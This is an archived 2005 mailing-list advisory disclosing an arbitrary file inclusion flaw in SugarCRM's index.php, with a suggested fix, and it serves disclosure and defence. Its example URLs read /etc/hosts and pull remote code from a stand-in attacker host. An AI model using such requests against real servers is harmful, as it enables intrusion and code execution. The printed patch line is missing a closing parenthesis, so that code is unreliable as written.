| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
From: blindot at gmail.com (Santiago Cortes)
Subject: Arbitrary file inclusion in SugarCRM [PHP]
------------------------------------------------------------
Arbitrary File Inclusion in SugarCRM
------------------------------------------------------------
Author: Santiago Cort?s
Date: Jan 06, 2005
------------------------------------------------------------
Vulnerability:
Failure to sanitize user input in index.php opens the possibility for
an attacker to include an arbitrary file when PHP's "register_globals"
is on.
Example:
http://www.sugarsales.com/index.php?module=Home&moduleDefaultFile[Home]=/etc/hosts
http://www.sugarsales.com/index.php?module=Home&moduleDefaultFile[Home]=http://www.attackersite.com/malicious.php
Fix:
Disable register_globals in your php.ini file, or
Replace line 198 in index.php:
$currentModuleFile = $moduleDefaultFile[$currentModule];
With
if ( !isset($moduleDefaultFile[$currentModule] ) {
die('No action specified');
}
$currentModuleFile = $moduleDefaultFile[$currentModule];
Disclaimer:
The information in this advisory and any of its demonstrations is
provided "as is" without any warranty of any kind.
I am not liable for any direct or indirect damages caused as a result
of using the information or demonstrations provided in any part of
this advisory.
Contact:
Santiago Cort?s
blindot --at-- gmail
Powered by blists - more mailing lists